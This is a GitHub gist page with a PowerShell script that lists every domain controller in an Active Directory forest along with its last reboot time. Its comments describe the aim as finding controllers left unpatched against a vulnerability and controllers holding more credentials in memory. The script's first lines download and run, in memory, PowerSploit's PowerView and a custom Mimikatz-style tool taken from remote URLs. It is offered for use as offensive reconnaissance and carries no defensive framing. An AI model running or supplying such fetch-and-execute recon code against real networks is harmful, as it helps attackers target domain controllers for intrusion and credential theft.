Last active
April 21, 2017 14:15
-
-
Save daniel0x00/0d7e50ae62813a687ff310ea37fdcecf to your computer and use it in GitHub Desktop.
PowerShell script to retrieve a list of all Domain Controllers on a domain, including also the StartTime (last reboot) of each DC.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## | |
| # | |
| # PowerShell script to retrieve a list of all Domain Controllers on a domain, including also the StartTime (last reboot) of each DC. | |
| # Useful: | |
| # - For determine which server could be affected for a non-patched vulnerability. | |
| # - For determine which server could have more credentials in its memory. | |
| # ### | |
| # No admin privilege required to run this script. | |
| # PowerShell version 2 is required. | |
| # ### | |
| # Output: PSObject | |
| # | |
| # DomainController Domain OSversion StartTime | |
| # ---------------- ------ --------- --------- | |
| # dc01.domain.com domain.com Windows Server® 2008 Enterprise without Hyper-V 23/03/2017 14:20:16 | |
| # dc02.domain.com domain.com Windows Server® 2008 Enterprise without Hyper-V 26/03/2017 01:24:49 | |
| # dc03.domain.com domain.com Windows Server® 2008 Enterprise without Hyper-V 22/03/2017 06:43:16 | |
| # | |
| ## | |
| # Download and invoke PowerView and custom version of 'the cat': | |
| iex(New-Object System.Net.WebClient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1') | |
| iex(New-Object System.Net.WebClient).downloadstring('https://gist.githubusercontent.com/daniel0x00/3af43e27021ea94ff4d6f1da8d9b209a/raw/Invoke-WinMI.ps1') | |
| # Retreive all DCs and theirs StartTime datetime: | |
| Get-Forest | Select -ExpandProperty domains | Get-Domain | Select -ExpandProperty domaincontrollers | Select name, domain, OSversion | % { | |
| $dc = $_.name | |
| # Raw request of StatisticsStartTime using 'the cat', then parse it using regex: | |
| $start_time_raw = Invoke-WinMI -Command "`"net::stats $($dc)`"" | Out-String | |
| $start_time_parsed = [string](([regex]::Match($start_time_raw,"StatisticsStartTime: (?<datetime>[\d\/]+ \d{2}:\d{2}:\d{2})")).groups["datetime"].value) | |
| # Out the object to pipeline: | |
| $out = New-Object -TypeName PSObject | |
| $out | Add-Member -MemberType NoteProperty -Name DomainController -Value $dc | |
| $out | Add-Member -MemberType NoteProperty -Name Domain -Value $_.domain | |
| $out | Add-Member -MemberType NoteProperty -Name OSversion -Value $_.osversion | |
| $out | Add-Member -MemberType NoteProperty -Name StartTime -Value $start_time_parsed | |
| $out | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment